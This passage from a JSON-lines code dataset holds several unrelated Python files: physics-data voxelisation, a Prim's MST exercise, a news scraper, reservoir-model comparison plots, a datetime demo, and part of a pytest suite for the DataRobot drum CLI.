python3\n\"\"\"Script for 
generating discretized ATTPC data.\n\nAuthor: Anton Såmark-Roth\n\nOriginal Author: Ryan Strauss\n\"\"\"\nimport click\nimport h5py\nimport numpy as np\nimport os\nimport pandas as pd\n#import pytpc\nimport scipy as sp\nfrom sklearn.utils import shuffle\n\nfrom data_processing.data import read_and_label_data, X_COL, Y_COL, Z_COL, CHARGE_COL\n\nimport math\n\n# Currently we're setting the image pixel values as the logarithm of the charge!\ndef _l(a):\n return 0 if a == 0 else math.log10(a)\n\ndef generate_voxelised_data_set(data_dir, save_dir, prefix, nbr_bins=20):\n print(\"Generating voxelised data set ...\")\n \n X_DISC, Y_DISC, Z_DISC = nbr_bins, nbr_bins, nbr_bins\n \n # Create empty array to hold data\n data = []\n\n raw_data = list(read_and_label_data(data_dir).values())\n for i, l in enumerate(raw_data):\n xyzs = raw_data[i][0]\n data.append([discretize_grid_charge(xyzs, X_DISC, Y_DISC, Z_DISC), raw_data[i][1]])\n\n # Split into train and test sets\n print(\"Split into train and test sets ...\")\n data = shuffle(data)\n partition = int(len(data) * 0.8)\n train = data[:partition]\n test = data[partition:]\n\n train_features = [t[0] for t in train]\n train_targets = [t[1] for t in train]\n test_features = [t[0] for t in test]\n test_targets = [t[1] for t in test]\n\n train_features = sp.sparse.vstack(train_features, format='csr')\n test_features = sp.sparse.vstack(test_features, format='csr')\n\n # Save\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n print('Saving to npz and HDF5 file...')\n sp.sparse.save_npz(os.path.join(save_dir, '{}train-features.npz'.format(prefix)), train_features)\n sp.sparse.save_npz(os.path.join(save_dir, '{}test-features.npz'.format(prefix)), test_features)\n h5 = h5py.File(os.path.join(save_dir, '{}voxels.h5'.format(prefix)), 'w')\n h5.create_dataset('train_targets', data=train_targets)\n h5.create_dataset('test_targets', data=test_targets)\n h5.close()\n\nDETECTOR_LENGTH = 1250.0\nDETECTOR_RADIUS = 275.0\n\ndef get_xyz_from_bucket(bucket_num, x_disc, y_disc, z_disc):\n z = np.floor_divide(bucket_num,(x_disc*y_disc))\n y = np.floor_divide(bucket_num - z*x_disc*y_disc, x_disc)\n x = bucket_num - z*x_disc*y_disc - y*x_disc\n return x, y, z\n\ndef discretize_grid_charge(xyz, x_disc, y_disc, z_disc):\n \"\"\"Discretizes AT-TPC point cloud data using a grid geometry by totalling\n charge of hits in a given rectangular bucket.\n\n Parameters\n ----------\n xyz : point cloud data with shape (n,5) where n is the number of traces\n x_disc : number of slices in x\n y_disc : number of slices in y\n z_disc : number of slices in z\n\n Returns\n -------\n The discretized data in a csr sparse matrix of shape (1, x_disc*y_disc*z_disc)\n \"\"\"\n\n # calculate desired discretization resolution\n disc_elements = x_disc * y_disc * z_disc\n\n buckets = []\n charges = []\n\n for i, point in enumerate(xyz):\n #if i < 2:\n # print(point[0], point[1], point[2])\n # check that z-coordinate of point is in appropriate range\n if point[Z_COL] > DETECTOR_LENGTH:\n continue\n\n x_bucket = math.floor(((point[X_COL] + DETECTOR_RADIUS) / (2 * DETECTOR_RADIUS)) * x_disc)\n y_bucket = math.floor(((point[Y_COL] + DETECTOR_RADIUS) / (2 * DETECTOR_RADIUS)) * y_disc)\n z_bucket = math.floor((point[Z_COL] / DETECTOR_LENGTH) * z_disc)\n\n bucket_num = z_bucket * x_disc * y_disc + x_bucket + y_bucket * x_disc\n\n buckets.append(bucket_num)\n \n x, y, z = get_xyz_from_bucket(bucket_num, x_disc, y_disc, z_disc)\n \n assert x == 
x_bucket\n assert y == y_bucket\n assert z == z_bucket\n\n # scaling by factor of 1000\n #charges.append(point[CHARGE_COL] / 1000)\n # log10 scaling\n charges.append(np.log10(point[CHARGE_COL]))\n\n cols = buckets\n rows = np.zeros(len(cols))\n data = charges\n\n # automatically sums charge values for data occurring at the (row, col)\n discretized_data_sparse_CHARGE = sp.sparse.csr_matrix((data, (rows, cols)), shape=(1, disc_elements))\n return discretized_data_sparse_CHARGE\n\n\n\n@click.command()\n@click.argument('data_dir', type=click.Path(exists=True, file_okay=False, dir_okay=True), nargs=1)\n@click.option('--save_dir', type=click.Path(exists=False, file_okay=False, dir_okay=True), default='',\n help='Where to save the generated data.')\n@click.option('--prefix', type=click.STRING, default='',\n help='Prefix for the saved file names and/or files read in. By default, there is no prefix.')\n\ndef main(data_dir, save_dir, prefix):\n \"\"\"This script will discretize and save ATTPC event data.\n \"\"\"\n\n generate_voxelised_data_set(data_dir, save_dir, prefix)\n\nif __name__ == '__main__':\n main()\n","sub_path":"data_processing/generate_voxels.py","file_name":"generate_voxels.py","file_ext":"py","file_size_in_byte":4935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"11184604","text":"\"\"\"\nYour task is to run Prim's minimum spanning tree algorithm\non this graph. You should report the overall cost of a minimum\nspanning tree.\n\"\"\"\nimport heapq\n\n\nclass Edge:\n def __init__(self, node1, node2, weight):\n self.node1 = node1\n self.node2 = node2\n self.weight = weight\n\n def other_node(self, node):\n if node == self.node1:\n return self.node2\n elif node == self.node2:\n return self.node1\n else:\n raise KeyError\n\n def __lt__(self, other):\n return self.weight < other.weight\n\n def __gt__(self, other):\n return self.weight > other.weight\n\n\nclass WeightedGraph:\n \"\"\"Encapsulates graphs, has functions to mark nodes / edges as explored\n \"\"\"\n def __init__(self):\n self.graph = dict()\n self.explored_edges = dict()\n self.explored_nodes = dict()\n\n def add_edge(self, node1, node2, weight):\n \"Add an edge to the graph\"\n new_edge = Edge(node1, node2, weight)\n self.graph[node1] = self.graph.get(node1, []) + [new_edge]\n self.graph[node2] = self.graph.get(node2, []) + [new_edge]\n\n def mark_node_explored(self, node):\n \"Mark a node as explored, note this does not mark an edge as explored\"\n self.explored_nodes[node] = True\n\n def mark_edge_explored(self, edge):\n \"Mark an edge explored, note this does not mark either node explored\"\n self.explored_edges[edge] = True\n\n def is_explored_node(self, node):\n return self.explored_nodes.get(node, False)\n\n def is_explored_edge(self, edge):\n return self.explored_edges.get(edge, False)\n\n def all_nodes_explored(self):\n return len(self.explored_nodes) == len(self.graph)\n\n def all_nodes(self):\n return iter(self.graph.keys())\n\n def get_edges(self, node):\n return self.graph[node]\n\n\nclass EdgeHeap:\n \"Implements a min heap of edges (key is the edge weight)\"\n def __init__(self):\n self.heap = []\n\n def add_edge(self, edge):\n heapq.heappush(self.heap, edge)\n\n def get_min(self):\n return heapq.heappop(self.heap)\n\n def __len__(self):\n return len(self.heap)\n\n\ndef prim_mst(graph):\n \"Calculates the minimum spanning tree of a graph and returns its total weight\"\n node = next(graph.all_nodes())\n edge_heap = EdgeHeap()\n total = 0\n while(True):\n 
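# Invariant: explored nodes form the tree built so far; the heap holds\n # candidate crossing edges keyed by weight, and stale edges (both\n # endpoints already explored) are skipped lazily by the inner loop.\n 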
graph.mark_node_explored(node)\n for edge in graph.get_edges(node):\n if graph.is_explored_edge(edge):\n continue\n elif graph.is_explored_node(edge.other_node(node)):\n continue\n else:\n graph.mark_edge_explored(edge)\n edge_heap.add_edge(edge)\n if graph.all_nodes_explored():\n break\n\n while(True):\n next_edge = edge_heap.get_min()\n node1 = next_edge.node1\n node2 = next_edge.node2\n if not graph.is_explored_node(node1):\n total += next_edge.weight\n node = node1\n break\n elif not graph.is_explored_node(node2):\n total += next_edge.weight\n node = node2\n break\n return total\n\n\ndef main():\n data = \"/Users/brendonsullivan/Documents/docs/coursera_hw/primm_mst.txt\"\n graph = WeightedGraph()\n with open(data, 'r') as f:\n header = True\n for line in f:\n if header:\n header = False\n continue\n node1, node2, weight = [int(x) for x in line.split(' ')]\n graph.add_edge(node1, node2, weight)\n print(prim_mst(graph))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"coursera/algorithms/course_3/problem_set_1_3.py","file_name":"problem_set_1_3.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"479757380","text":"\"\"\"\nI am going to use the news scraped from news websites to do text summarization.\n\"\"\"\n\n# import required modules\nimport feedparser as fp\nimport json\nimport newspaper # from newspaper3k not newspaper\nfrom newspaper import Article\nfrom time import mktime\nfrom datetime import datetime\nimport os\nfrom nltk import sent_tokenize\nfrom nltk.corpus import stopwords\nfrom functions.TextRank import TextRank_Class\nimport os\n\n\n# load the news_websites.json file\nfile_dir = os.path.dirname(os.path.realpath(__file__))\npath = file_dir + '/docs/'\nwith open((path + 'news_websites.json'), encoding='utf-8') as f:\n news_websites = json.load(f)\n\n\n# the process to scrape news\nnews_data = {}\n\nnews_data['articles'] = {}\n\ncount = 1\n\nlimit = 1\n\nfor company, value in news_websites.items():\n\n # read news from rss\n \"\"\"\n From wiki:\n RSS (Rich Site Summary), originally RDF Site Summary, often called\n 'Really Simple Syndication', is a type of web feed which allows users to\n access updates to online content in a standardized, computer-readable\n format.\n \"\"\"\n if 'rss' in value:\n\n # read the content of rss file\n d = fp.parse(value['rss'])\n print(\"Downloading articles from \", company)\n\n # create a dict to save the data read from current rss\n news_website = {\n \"rss\": value['rss'],\n \"link\": value['link'],\n \"articles\": [] # there are no articles yet\n }\n\n for entry in d.entries:\n\n # Check if the news is published\n # hasattr checks whether an attribute exists\n if hasattr(entry, 'published'):\n\n # we are going to scrape only a limited number of articles from each\n # website\n if count > limit:\n break\n\n # create dict to store the information of news\n article = {}\n article['link'] = entry.link\n date = entry.published_parsed\n article['published'] = (datetime.\n fromtimestamp(mktime(date)).\n isoformat())\n\n # the Article class acquires the article from a given url\n try:\n content = Article(entry.link)\n content.download()\n content.parse()\n except Exception as e:\n # If the download for some reason fails (ex. 404) the\n # script will continue downloading the next article.\n print(e)\n print(\"continuing...\")\n continue\n\n # Then store the attributes of this article\n article['title'] = content.title\n article['text'] = content.text\n news_website['articles'].append(article)\n print(count, \"articles downloaded from\", company, \", url: \",\n entry.link)\n count = count + 1\n\n # If the RSS is not available\n else:\n print(\"Building site for \", company)\n paper = newspaper.build(value['link'], memoize_articles=False)\n news_website = {\n \"link\": value['link'],\n \"articles\": []\n }\n # noneTypeCount to record the unwanted news; for example, no publish\n # date.\n noneTypeCount = 0\n for content in paper.articles:\n if count > limit:\n break\n try:\n content.download()\n content.parse()\n except Exception as e:\n print(e)\n print(\"continuing...\")\n continue\n # After 10 downloaded articles from the same newspaper without\n # publish date, the company will be skipped.\n if content.publish_date is None:\n print(count, \" Article has no publish date...\")\n noneTypeCount = noneTypeCount + 1\n if noneTypeCount > 10:\n print(\"Too many noneType dates, aborting...\")\n noneTypeCount = 0\n break\n count = count + 1 # even though there is no article\n # downloaded, the count still increases by one\n continue\n article = {}\n article['title'] = content.title\n article['text'] = content.text\n article['link'] = content.url\n article['published'] = content.publish_date.isoformat()\n news_website['articles'].append(article)\n print(count, \"articles downloaded from\", company,\n \" using newspaper, url: \", content.url)\n count = count + 1\n noneTypeCount = 0\n\n # save the scraped news into the news_data\n count = 1\n news_data['articles'][company] = news_website\n\n\n# save the scraped news information\nfile_dir = os.path.dirname(os.path.realpath(__file__))\nos.chdir(file_dir + '/docs')\nwith open('news_data.json', 'w', encoding='utf-8') as f:\n json.dump(news_data, f)\n\n\"\"\"\n#\nos.chdir(\"/Users/rucachen/Desktop/open_pycharm_virtualenv_3.6.4/News_Summarization/TextRank\")\nwith open('test', 'r') as f:\n data = f.readlines()\n\n#a = news_data[\"articles\"][\"bbc\"][\"articles\"][0].get(\"text\")\n#data = sent_tokenize(a)\nstop_words = set(stopwords.words('english'))\ntest = TextRank_Class.TextRank(data, 0.1)\ntest_S_matrix = test.build_similarity_matrix(stopwords=stop_words)\ntest_PageRank = test.pagerank()\ntest_Top_Sentence = test.acquire_top_sentence()\ntest.Top_Sentence\n\"\"\"\n","sub_path":"calculation.py","file_name":"calculation.py","file_ext":"py","file_size_in_byte":5570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"308541879","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# should match columns\nvegscens = ['Control', 'Treatment',\n 'OldFireModel_Extreme_Control',\n 'OldFireModel_Moderate_Control',\n 'OldFireModel_Extreme_Treatment',\n 'OldFireModel_Moderate_Treatment']\n\nenvscen = 'FERC'\n\nhistoropt = 'hist'\n\n# comparison 1: total power generation FRM+HHL\ndf_FRM = pd.read_csv('oasis-csv/FRM-monthly-generation-MWh.csv', index_col=0, parse_dates=True)\ndf_HHL = pd.read_csv('oasis-csv/HHL-monthly-generation-MWh.csv', index_col=0, parse_dates=True)\n\nprint('Comparing total annual generation...')\nfor vs in vegscens:\n fname = vs + '_' + envscen + '.csv'\n df = pd.read_csv('timeseries/%s-policy/'%historopt + fname, index_col=0, parse_dates=True)\n power = 
df.total_power.resample('AS-OCT').sum()\n power2 = (df_FRM[vs] + df_HHL[vs]).resample('AS-OCT').sum()\n r2 = np.corrcoef(power.values, power2.values)**2\n print(fname + ',' + str(r2[0,1]))\n\n power.plot()\n power2.plot()\n plt.legend(['Our model', 'OASIS'])\n plt.ylabel('FRM+HHL total generation, MWh/year')\n plt.savefig('oasis-plots/%s-policy/'%historopt + 'total-power_%s_%s.png' % (vs, envscen))\n plt.close()\n\n# comparison 2: storage at different timescales\nprint('Comparing HHL daily storage...')\ndf_FRM = pd.read_csv('oasis-csv/FRM-daily-storage-AF.csv', index_col=0, parse_dates=True)\ndf_HHL = pd.read_csv('oasis-csv/HHL-daily-storage-AF.csv', index_col=0, parse_dates=True)\n\nfor vs in vegscens:\n fname = vs + '_' + envscen + '.csv'\n df = pd.read_csv('timeseries/%s-policy/'%historopt + fname, index_col=0, parse_dates=True)\n storage = df.SHHL\n storage2 = df_HHL[vs] / 1000\n r2 = np.corrcoef(storage.values, storage2.values)**2\n print(fname + ',' + str(r2[0,1]))\n storage.plot()\n storage2.plot()\n plt.legend(['Our model', 'OASIS'])\n plt.ylabel('Storage (TAF)')\n plt.savefig('oasis-plots/%s-policy/'%historopt + 'HHLStorage_%s_%s.png' % (vs, envscen))\n plt.close()\n\nprint('Comparing FMD daily storage...')\nfor vs in vegscens:\n fname = vs + '_' + envscen + '.csv'\n df = pd.read_csv('timeseries/%s-policy/'%historopt + fname, index_col=0, parse_dates=True)\n storage = df.SFMD\n storage2 = df_FRM[vs] / 1000\n r2 = np.corrcoef(storage.values, storage2.values)**2\n print(fname + ',' + str(r2[0,1]))\n storage.plot()\n storage2.plot()\n plt.legend(['Our model', 'OASIS'])\n plt.ylabel('Storage (TAF)')\n plt.savefig('oasis-plots/%s-policy/'%historopt + 'FMDStorage_%s_%s.png' % (vs, envscen))\n plt.close()","sub_path":"results/test-darin-data.py","file_name":"test-darin-data.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"543485402","text":"import datetime\n\nformats=[\"%d/%m/%Y %H:%M:%S\",\n \"%d/%m/%Y %H:%M%f\",\n \"%Y-%m-%d %H:%M:%S.%f\",\n \"%m/%d/%Y\",\n \"%d/%m/%Y\",\n \"%m-%d-%Y\",\n \"%d-%m-%Y\",\n \"%H:%M:%S\",\n \"%M:%S\"\n ] \n\n\nfor ft in formats:\n time = datetime.datetime.now()\n time = time.strftime(ft)\n print(\"Format\",ft,\": \", time)\n","sub_path":"pyshine/15-drag_drop_plot/date_time_formats.py","file_name":"date_time_formats.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"630599791","text":"import collections\nimport glob\nimport json\nimport os\nimport pickle\nimport re\nimport shutil\nimport signal\nimport subprocess\nimport time\nfrom tempfile import NamedTemporaryFile\nfrom threading import Thread\nfrom unittest import mock\nfrom uuid import uuid4\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nimport requests\n\nfrom datarobot_drum.drum.args_parser import CMRunnerArgsRegistry\nfrom datarobot_drum.drum.common import (\n ArgumentsOptions,\n CUSTOM_FILE_NAME,\n CustomHooks,\n PythonArtifacts,\n RunMode,\n)\nfrom datarobot_drum.drum.runtime import DrumRuntime\n\nTRAINING = \"training\"\nINFERENCE = \"inference\"\n\n# Framework keywords\nXGB = \"xgboost\"\nKERAS = \"keras\"\nKERAS_JOBLIB = \"keras_joblib\"\nSKLEARN = \"sklearn\"\nSIMPLE = \"simple\"\nPYTORCH = \"pytorch\"\nPYPMML = \"pypmml\"\n\nRDS = \"rds\"\nCODEGEN = \"jar\"\n## adding h2o pojo and mojo\nMOJO = \"zip\"\nPOJO = \"java\"\n##\nMULTI_ARTIFACT = 
\"codegen_and_sklearn\"\n# Problem keywords, used to mark datasets\nREGRESSION = \"regression\"\nREGRESSION_INFERENCE = \"regression_inference\"\nBINARY = \"binary\"\n\n# Language keywords\nPYTHON = \"python3\"\nNO_CUSTOM = \"no_custom\"\nPYTHON_ALL_HOOKS = \"python_all_hooks\"\nPYTHON_LOAD_MODEL = \"python_load_model\"\nR = \"R\"\nR_ALL_HOOKS = \"R_all_hooks\"\nR_FIT = \"R_fit\"\nJAVA = \"java\"\nPYTHON_XGBOOST_CLASS_LABELS_VALIDATION = \"predictions_and_class_labels_validation\"\n\nDOCKER_PYTHON_SKLEARN = \"cmrunner_test_env_python_sklearn\"\n\nRESPONSE_PREDICTIONS_KEY = \"predictions\"\n\nWEIGHTS_ARGS = \"weights-args\"\nWEIGHTS_CSV = \"weights-csv\"\n\n\nclass DrumServerProcess:\n def __init__(self):\n self.process = None\n self.out_stream = None\n self.err_stream = None\n\n @property\n def returncode(self):\n return self.process.returncode\n\n\nclass DrumServerRun:\n def __init__(\n self,\n framework,\n problem,\n custom_model_dir,\n docker=None,\n with_error_server=False,\n show_stacktrace=True,\n ):\n port = 6799\n server_address = \"localhost:{}\".format(port)\n url_host = os.environ.get(\"TEST_URL_HOST\", \"localhost\")\n if docker:\n self.url_server_address = \"http://{}:{}\".format(url_host, port)\n else:\n self.url_server_address = \"http://localhost:{}\".format(port)\n\n cmd = \"{} server --code-dir {} --address {}\".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, server_address\n )\n cmd = TestCMRunner._cmd_add_class_labels(cmd, framework, problem)\n if docker:\n cmd += \" --docker {}\".format(docker)\n if with_error_server:\n cmd += \" --with-error-server\"\n if show_stacktrace:\n cmd += \" --show-stacktrace\"\n self._cmd = cmd\n\n self._process_object_holder = DrumServerProcess()\n self._server_thread = None\n\n def __enter__(self):\n self._server_thread = Thread(\n target=TestCMRunner.run_server_thread, args=(self._cmd, self._process_object_holder)\n )\n self._server_thread.start()\n time.sleep(0.5)\n\n TestCMRunner.wait_for_server(\n self.url_server_address, timeout=10, process_holder=self._process_object_holder\n )\n\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n # shutdown server\n response = requests.post(self.url_server_address + \"/shutdown/\")\n assert response.ok\n time.sleep(1)\n\n self._server_thread.join()\n\n @property\n def process(self):\n return self._process_object_holder or None\n\n\nclass TestCMRunner:\n @classmethod\n def setup_class(cls):\n cls.tests_root_path = os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\"))\n cls.tests_fixtures_path = os.path.join(cls.tests_root_path, \"fixtures\")\n cls.tests_artifacts_path = os.path.join(cls.tests_fixtures_path, \"drop_in_model_artifacts\")\n cls.tests_data_path = os.path.join(cls.tests_root_path, \"testdata\")\n cls.training_templates_path = os.path.join(\n cls.tests_root_path, \"..\", \"model_templates\", \"training\"\n )\n\n cls.paths_to_training_models = {\n (PYTHON, SKLEARN): os.path.join(cls.training_templates_path, \"python3_sklearn\"),\n (PYTHON, SIMPLE): os.path.join(cls.training_templates_path, \"simple\"),\n (PYTHON, KERAS): os.path.join(cls.training_templates_path, \"python3_keras_joblib\"),\n (PYTHON, XGB): os.path.join(cls.training_templates_path, \"python3_xgboost\"),\n (R_FIT, RDS): os.path.join(cls.training_templates_path, \"r_lang\"),\n (PYTHON, PYTORCH): os.path.join(cls.training_templates_path, \"python3_pytorch\"),\n }\n\n cls.fixtures = {\n PYTHON: (os.path.join(cls.tests_fixtures_path, \"custom.py\"), \"custom.py\"),\n NO_CUSTOM: (None, None),\n 
PYTHON_ALL_HOOKS: (\n os.path.join(cls.tests_fixtures_path, \"all_hooks_custom.py\"),\n \"custom.py\",\n ),\n PYTHON_XGBOOST_CLASS_LABELS_VALIDATION: (\n os.path.join(cls.tests_fixtures_path, \"pred_validation_custom.py\"),\n \"custom.py\",\n ),\n PYTHON_LOAD_MODEL: (\n os.path.join(cls.tests_fixtures_path, \"load_model_custom.py\"),\n \"custom.py\",\n ),\n R: (os.path.join(cls.tests_fixtures_path, \"custom.R\"), \"custom.R\"),\n R_ALL_HOOKS: (os.path.join(cls.tests_fixtures_path, \"all_hooks_custom.R\"), \"custom.R\"),\n R_FIT: (os.path.join(cls.tests_fixtures_path, \"fit_custom.R\"), \"custom.R\"),\n }\n cls.datasets = {\n # If specific dataset should be defined for a framework, use (framework, problem) key.\n # Otherwise default dataset is used (None, problem)\n (None, REGRESSION): os.path.join(cls.tests_data_path, \"boston_housing.csv\"),\n (PYPMML, REGRESSION): os.path.join(cls.tests_data_path, \"iris_binary_training.csv\"),\n (None, REGRESSION_INFERENCE): os.path.join(\n cls.tests_data_path, \"boston_housing_inference.csv\"\n ),\n (None, BINARY): os.path.join(cls.tests_data_path, \"iris_binary_training.csv\"),\n }\n\n cls.artifacts = {\n (None, REGRESSION): None,\n (None, BINARY): None,\n (SKLEARN, REGRESSION): os.path.join(cls.tests_artifacts_path, \"sklearn_reg.pkl\"),\n (SKLEARN, REGRESSION_INFERENCE): os.path.join(\n cls.tests_artifacts_path, \"sklearn_reg.pkl\"\n ),\n (MULTI_ARTIFACT, REGRESSION): [\n os.path.join(cls.tests_artifacts_path, \"sklearn_reg.pkl\"),\n os.path.join(cls.tests_artifacts_path, \"keras_reg.h5\"),\n ],\n (CODEGEN_AND_SKLEARN, REGRESSION): [\n os.path.join(cls.tests_artifacts_path, \"java_reg.jar\"),\n os.path.join(cls.tests_artifacts_path, \"sklearn_reg.pkl\"),\n ],\n (SKLEARN, BINARY): os.path.join(cls.tests_artifacts_path, \"sklearn_bin.pkl\"),\n (KERAS, REGRESSION): os.path.join(cls.tests_artifacts_path, \"keras_reg.h5\"),\n (KERAS, BINARY): os.path.join(cls.tests_artifacts_path, \"keras_bin.h5\"),\n (XGB, REGRESSION): os.path.join(cls.tests_artifacts_path, \"xgb_reg.pkl\"),\n (XGB, BINARY): os.path.join(cls.tests_artifacts_path, \"xgb_bin.pkl\"),\n (PYTORCH, REGRESSION): [\n os.path.join(cls.tests_artifacts_path, \"torch_reg.pth\"),\n os.path.join(cls.tests_artifacts_path, \"PyTorch.py\"),\n ],\n (PYTORCH, BINARY): [\n os.path.join(cls.tests_artifacts_path, \"torch_bin.pth\"),\n os.path.join(cls.tests_artifacts_path, \"PyTorch.py\"),\n ],\n (RDS, REGRESSION): os.path.join(cls.tests_artifacts_path, \"r_reg.rds\"),\n (RDS, BINARY): os.path.join(cls.tests_artifacts_path, \"r_bin.rds\"),\n (CODEGEN, REGRESSION): os.path.join(cls.tests_artifacts_path, \"java_reg.jar\"),\n (CODEGEN, BINARY): os.path.join(cls.tests_artifacts_path, \"java_bin.jar\"),\n (POJO, REGRESSION): os.path.join(\n cls.tests_artifacts_path,\n \"pojo_reg\",\n \"drf_887c2e5b_0941_40b7_ae26_cae274c4b424.java\",\n ),\n (POJO, BINARY): os.path.join(\n cls.tests_artifacts_path,\n \"pojo_bin\",\n \"XGBoost_grid__1_AutoML_20200717_163214_model_159.java\",\n ),\n (MOJO, REGRESSION): os.path.join(cls.tests_artifacts_path, \"mojo_reg.zip\"),\n (MOJO, BINARY): os.path.join(cls.tests_artifacts_path, \"mojo_bin.zip\"),\n (PYPMML, REGRESSION): os.path.join(cls.tests_artifacts_path, \"iris_reg.pmml\"),\n (PYPMML, BINARY): os.path.join(cls.tests_artifacts_path, \"iris_bin.pmml\"),\n }\n\n cls.target = {BINARY: \"Species\", REGRESSION: \"MEDV\"}\n cls.class_labels = {\n (SKLEARN, BINARY): [\"Iris-setosa\", \"Iris-versicolor\"],\n (XGB, BINARY): [\"Iris-setosa\", \"Iris-versicolor\"],\n (KERAS, BINARY): 
[\"Iris-setosa\", \"Iris-versicolor\"],\n (RDS, BINARY): [\"Iris-setosa\", \"Iris-versicolor\"],\n (PYPMML, BINARY): [\"Iris-setosa\", \"Iris-versicolor\"],\n }\n\n @classmethod\n def teardown_class(cls):\n pass\n\n @staticmethod\n def _exec_shell_cmd(cmd, err_msg, assert_if_fail=True, process_obj_holder=None, env=os.environ):\n p = subprocess.Popen(\n cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n shell=True,\n env=env,\n universal_newlines=True,\n )\n if process_obj_holder is not None:\n process_obj_holder.process = p\n\n (stdout, stderr) = p.communicate()\n\n if process_obj_holder is not None:\n process_obj_holder.out_stream = stdout\n process_obj_holder.err_stream = stderr\n\n if p.returncode != 0:\n print(\"stdout: {}\".format(stdout))\n print(\"stderr: {}\".format(stderr))\n if assert_if_fail:\n assert p.returncode == 0, err_msg\n\n return p, stdout, stderr\n\n @classmethod\n def _create_custom_model_dir(\n cls, custom_model_dir, framework, problem, language, is_training=False, nested=False\n ):\n if nested:\n custom_model_dir = custom_model_dir.joinpath(\"nested_dir\")\n custom_model_dir.mkdir(parents=True, exist_ok=True)\n if is_training:\n model_template_dir = cls.paths_to_training_models[(language, framework)]\n\n if language == PYTHON:\n files = glob.glob(r\"{}/*.py\".format(model_template_dir))\n elif language in [R, R_ALL_HOOKS, R_FIT]:\n files = glob.glob(r\"{}/*.r\".format(model_template_dir)) + glob.glob(\n r\"{}/*.R\".format(model_template_dir)\n )\n\n for filename in files:\n shutil.copy2(filename, custom_model_dir)\n else:\n artifact_filenames = cls._get_artifact_filename(framework, problem)\n if artifact_filenames is not None:\n if not isinstance(artifact_filenames, list):\n artifact_filenames = [artifact_filenames]\n for filename in artifact_filenames:\n shutil.copy2(filename, custom_model_dir)\n\n fixture_filename, rename = cls._get_fixture_filename(language)\n if fixture_filename:\n shutil.copy2(fixture_filename, os.path.join(custom_model_dir, rename))\n return custom_model_dir\n\n @classmethod\n def _get_artifact_filename(cls, framework, problem):\n return cls.artifacts[(framework, problem)]\n\n @classmethod\n def _get_class_labels(cls, framework, problem):\n return cls.class_labels.get((framework, problem), None)\n\n @classmethod\n def _get_dataset_filename(cls, framework, problem):\n framework_key = framework\n problem_key = problem\n # if specific dataset for framework was not defined,\n # use default dataset for this problem, e.g. 
(None, problem)\n framework_key = None if (framework_key, problem_key) not in cls.datasets else framework_key\n return cls.datasets[(framework_key, problem_key)]\n\n @classmethod\n def _get_fixture_filename(cls, language):\n return cls.fixtures[language]\n\n @classmethod\n def _cmd_add_class_labels(cls, cmd, framework, problem):\n if problem != BINARY:\n return cmd\n\n labels = cls._get_class_labels(framework, problem)\n pos = labels[1] if labels else \"yes\"\n neg = labels[0] if labels else \"no\"\n cmd = cmd + \" --positive-class-label {} --negative-class-label {}\".format(pos, neg)\n return cmd\n\n @pytest.mark.parametrize(\n \"framework, problem, language, docker\",\n [\n (SKLEARN, REGRESSION_INFERENCE, NO_CUSTOM, None),\n (SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN),\n (SKLEARN, BINARY, PYTHON, None),\n (KERAS, REGRESSION, PYTHON, None),\n (KERAS, BINARY, PYTHON, None),\n (XGB, REGRESSION, PYTHON, None),\n (XGB, BINARY, PYTHON, None),\n (XGB, BINARY, PYTHON_XGBOOST_CLASS_LABELS_VALIDATION, None),\n (PYTORCH, REGRESSION, PYTHON, None),\n (PYTORCH, BINARY, PYTHON, None),\n (RDS, REGRESSION, R, None),\n (RDS, BINARY, R, None),\n (CODEGEN, REGRESSION, NO_CUSTOM, None),\n (CODEGEN, BINARY, NO_CUSTOM, None),\n (POJO, REGRESSION, NO_CUSTOM, None),\n (POJO, BINARY, NO_CUSTOM, None),\n (MOJO, REGRESSION, NO_CUSTOM, None),\n (MOJO, BINARY, NO_CUSTOM, None),\n (MULTI_ARTIFACT, REGRESSION, PYTHON_LOAD_MODEL, None),\n (PYPMML, REGRESSION, NO_CUSTOM, None),\n (PYPMML, BINARY, NO_CUSTOM, None),\n ],\n )\n def test_custom_models_with_drum(self, framework, problem, language, docker, tmp_path):\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(custom_model_dir, framework, problem, language)\n\n input_dataset = self._get_dataset_filename(framework, problem)\n\n output = tmp_path / \"output\"\n\n cmd = \"{} score --code-dir {} --input {} --output {}\".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset, output\n )\n cmd = self._cmd_add_class_labels(cmd, framework, problem)\n if docker:\n cmd += \" --docker {} --verbose \".format(docker)\n\n TestCMRunner._exec_shell_cmd(\n cmd, \"Failed in {} command line! {}\".format(ArgumentsOptions.MAIN_COMMAND, cmd)\n )\n in_data = pd.read_csv(input_dataset)\n out_data = pd.read_csv(output)\n assert in_data.shape[0] == out_data.shape[0]\n\n @pytest.mark.parametrize(\n \"framework, problem, language\", [(SKLEARN, BINARY, PYTHON), (RDS, BINARY, R)]\n )\n def test_bin_models_with_wrong_labels(self, framework, problem, language, tmp_path):\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(custom_model_dir, framework, problem, language)\n\n input_dataset = self._get_dataset_filename(framework, problem)\n cmd = \"{} score --code-dir {} --input {}\".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset\n )\n if problem == BINARY:\n cmd = cmd + \" --positive-class-label yes --negative-class-label no\"\n\n p, stdo, stde = TestCMRunner._exec_shell_cmd(\n 